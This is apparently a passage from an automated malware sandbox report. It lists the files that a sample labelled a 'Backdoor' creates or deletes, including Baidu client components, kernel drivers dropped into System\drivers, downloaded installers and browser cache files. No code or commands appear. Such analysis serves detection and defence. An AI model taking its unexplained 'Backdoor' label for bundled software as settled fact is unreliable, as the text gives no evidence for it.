%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-foward.png (156 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder-arrow-png8.png (292 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\bookmarks.css (9 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-clear-general.png (866 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\dust.png (812 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Report.dll (7232 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\365.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\moderate-snow.png (992 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\icon-tree-search-ie8.png (15 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\respond.min.js (4 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{5F68585C-AF28-4793-9360-66E51B87947C}\Microsoft.VC80.CRT\msvcm80.dll (3073 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Base.dll (77808 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\png8-dialog-close.png (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{48A02D42-CF48-4601-9126-5F90C2D01273}\Microsoft.VC80.ATL\microsoft.vc80.atl.manifest (466 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Heartbeat.dll (14384 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\gz.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\AppHTMLReSou.xml (438 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\duststorm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\input.png (214 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\weixinUI.xml (345 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\qq.png (1 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{2A53DBDC-6363-4742-8166-C38D1E5A4CF6}\Microsoft.VC80.ATL\microsoft.vc80.atl.manifest (466 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduUpdate.exe (11040 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-refresh.png (215 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-storm.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.svg (4992 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\fileverify.xml (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\thundershower.png (898 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\microsoft.vc80.crt\microsoft.vc80.crt.manifest (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BrowserFrame.dll (67494 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-baidu.png (367 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BDClientProxy.dll (45104 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\executor.xml (172 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-back.png (154 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\UtilsDll.dll (82 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe (24048 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x86\BDCEnhance.sys (0 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x86\bduniptk.sys (0 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x64\BDCEnhance.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\bdzc_Setup_2.0.3.124[1].dll (0 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\data\apps.db-journal (0 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x86\BDArKit.sys (0 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x86\bd0001.sys (0 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x64 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\f\LKHelper.7z (0 bytes)
%Documents and Settings%\All Users\Baidu\BDCLProxy\10000302_130892497314787500.dat (0 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x64\BDArKit.sys (0 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x86 (0 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124 (0 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x64\bduniptk.sys (0 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x64\bd0001.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp (0 bytes)

The process bcservice.exe:2752 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\data\apps.db-journal (31570 bytes)
%System%\drivers\BDArKit.sys (18653 bytes)
%System%\drivers\bd0001.sys (10077 bytes)
%System%\drivers\bduniptk.sys (35957 bytes)
%System%\drivers\BDCEnhance.sys (23573 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{D104CC61-BA7C-4141-994E-51D88791DBAC}.7z (9049 bytes)
%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\data\apps.db (4794 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\data\apps.db-journal (0 bytes)

The process DownLoad.exe:3484 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\DownSvrList[1].ini (406 bytes)

The Backdoor deletes the following file(s):

The process %original file name%.exe:1832 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\mm[1] (71033 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\7b1[1] (816682 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\zy[1] (427032 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\7gj1[1] (956170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\2k[1] (1021411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\ky[1] (628241 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\Baidu_Setup_1.6.200.359_ftn_1050103060[1].exe (681940 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Desktop\¿ìѹ.lnk (0 bytes)

The process KZReport.exe:1836 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\KuaiZip\report_config.txt (0 bytes)

The process 9158IE.exe:3432 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\100093_20131210143252[1].jpg (2253 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\DD_belatedPNG_0.0.8a[1].js (3902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777190_20150513200601968_255[2].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\impress_bg[1].png (1023 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGX12.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\120060_580689_20151012190739_n[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\weblog[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\dot1[1].png (1511 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777159_20150523182929109_255[1].jpg (10884 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\190177_20140307182314[1].jpg (2644 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\啤酒16[1].gif (674 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777171_20141013130050828_255[2].jpg (4353 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777190_20150513200601968_255[2].jpg (2275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\160345_m[1].jpg (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\jquery_v1.8.2[1].js (31937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\icon_play1[2].png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\190188_96453305_20151012164845_n[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\time_bk[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\777045_20141127144331328_255[1].jpg (10314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\120077_20150529222638[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\100088_20110913202308[1].jpg (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\8158882_20150701030552828_255[1].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\rom_k_10[1].jpg (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\9158911_20141220003749968_255[1].jpg (3813 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\100180_20121107150045[1].jpg (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\close[1].gif (235 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\8158603_20150810100123875_255[2].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\180128_m[1].jpg (1340 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\icon_default[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777190_20150513200601968_255[1].jpg (4358 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777171_20141013130050828_255[1].jpg (11719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\qq[1].gif (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\8158278_20150630211810562_255[1].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGX10.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\170030_20120813172620[1].jpg (4 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\150002_8158525_20150720162456890[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\130188_m[1].jpg (670 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\8158293_20151005022233843_255[1].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\impress_bg[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\120040_20130621153954[1].jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\150007_20140603231914[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\170068_20140416154958[1].jpg (2252 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\web9158_14[1].css (5542 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\200487_m[1].jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\icon_default[2].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777159_20150523182929109_255[1].jpg (6092 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777073_20141217193405703_255[1].jpg (6874 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\icon_default[3].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\medal20[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777171_20141013130050828_255[1].jpg (7478 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777145_20150827182932546_255[1].jpg (3299 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (2340 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\speed_v1[1].js (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\weblog[2].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\160345_m[1].jpg (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGXE.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\rom_k_6[1].jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777045_20141127144331328_255[1].jpg (6025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\8158603_20150810100123875_255[1].jpg (6079 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\8158603_20150810100123875_255[1].jpg (9126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGX11.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777190_20150513200601968_255[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\190354_m[1].jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\580108_20150816173136109_255[1].jpg (3225 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\view[1].htm (907 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\180004_20150719235055[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\people1[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\9158924_20150206021028109_255[1].jpg (2881 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\9158015_20150513013603984_255[1].jpg (3851 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\190149_9158382_20141117132627437[1].jpg (2905 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\DD_belatedPNG_0.0.8a[1].js (1969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\senlinwuhui201592_n[1].jpg (3064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\170159_20130701181900[1].jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\580279_20151013101824562_255[1].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\580191_20150812230520093_255[1].jpg (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\580327_20150904150143765_255[1].jpg (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\h[1].js (1794 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\100128_20140312235434[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\鲜花[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\190179s[1].jpg (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\190256_20131230171616[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\160236_m[1].jpg (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\190208_20120514134911[1].jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\120312_20140114132145[1].jpg (2156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGXF.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\h[2].js (1691 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777198_20151008201005109_255[1].jpg (8180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\icon_default[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777116_20150822141030265_255[2].jpg (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777073_20141217193405703_255[2].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\8158603_20150810100123875_255[1].jpg (5392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\200666_m[1].jpg (1340 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\120040_m[1].jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\180018_723723_20151013145141_n[1].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777073_20141217193405703_255[1].jpg (2699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\gift20[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\8158261_20150413013730468_255[1].jpg (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGXC.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\icon_room[1].png (751 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\btn_room[1].png (747 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\8158139_20150421010732765_255[1].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\getad4[2].htm (276 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\140263_m[1].jpg (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\duihuandoudou20141217_n[1].jpg (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\580275_20150911195526265_255[1].jpg (3126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\9158058_20150107044030437_255[1].jpg (2569 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777159_20150523182929109_255[1].jpg (5784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\people1[2].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\200296_20111031001753[1].jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\580275_20150911195526265_255[2].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\180102_20150903095300[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGXB.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777116_20150822141030265_255[1].jpg (4368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\777198_20151008201005109_255[1].jpg (5418 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGXA.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\9158767_20140807120443359_255[1].jpg (3970 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGX13.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\icon_play1[1].png (1491 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\180109_m[1].jpg (1340 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\190149s[1].jpg (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\9158811_20150609183123000_255[1].jpg (4706 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\8158013_20150805211018765_255[1].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\mm_22[1].png (2641 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\200288_m[1].jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\190188_20150723170630[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\base[1].js (10921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\130088_20120131202656[1].jpg (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\190116_m[1].jpg (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\580191_20150812230520093_255[1].jpg (3668 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\777073_20141217193405703_255[1].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\190128_m[1].jpg (1340 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\150013_20120703124557[1].jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\150051_20120504162134[1].jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777045_20141127144331328_255[1].jpg (5392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\close[1].png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT (192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777145_20150827182932546_255[2].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\580296_20140829233637328_255[1].jpg (2263 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\580585_20150915032829765_255[1].jpg (2923 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\140212_m[1].jpg (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\core[1].php (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777198_20151008201005109_255[1].jpg (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\blank[1].gif (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\180109_20150209152745[1].jpg (2013 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\580780_20150609184158187_255[1].jpg (2795 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\dot1[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\9158279_20150505030307609_255[1].jpg (2696 bytes)
